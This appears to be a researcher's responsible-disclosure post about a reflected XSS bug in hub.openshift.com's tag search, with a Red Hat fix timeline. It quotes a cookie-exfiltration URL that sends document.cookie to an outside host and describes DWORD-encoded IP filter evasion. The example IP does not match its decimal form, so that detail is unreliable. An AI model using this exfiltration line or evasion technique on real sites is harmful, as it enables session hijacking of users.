OpenShift is an Open Hybrid Cloud Application Platform by Red Hat that allows developers to quickly develop, host, and scale applications in a cloud environment.
I have found a very simple reflective Cross-Site Scripting vulnerability on https://hub.openshift.com. Tag searching function wasn’t filtered at all, so it was possible to display user cookies like this:
It soon turned out that stealing cookies is not so easy, because using a dot char („.”) or a forward slash („/” or „%2f„) resulted in an application error. No: https://lubi.cz/cookie.php?c=document.cookie for me this time…
Furthermore, the lack of dot character means that I could not use an IP address, nor file extension for cookie exfiltration. Even worse, no „http://”, nor „//” schema. But let’s take another look at XSS Filter Evasion Cheat Sheet.
DWORD encoding to the rescue!
- Take an IP address (Google.com – 126.96.36.199) and convert it to decimal (3627733326).
- Set your cookie stealer at your IP address (I used „google.com/?q=” for that).
- Create a payload without a dot char („.”) or a forward slash („/” or „%2f„). Only Firefox allowed me to use „http:” schema with those restrictions. Ladies and Gentelman, please welcome:
[19th May 2015] - bug was reported [25th August 2015] - another contact, no response [2nd September 2015] - RedHat's response [3rd September 2015] - partial fix [7th October 2015] - bug was resolved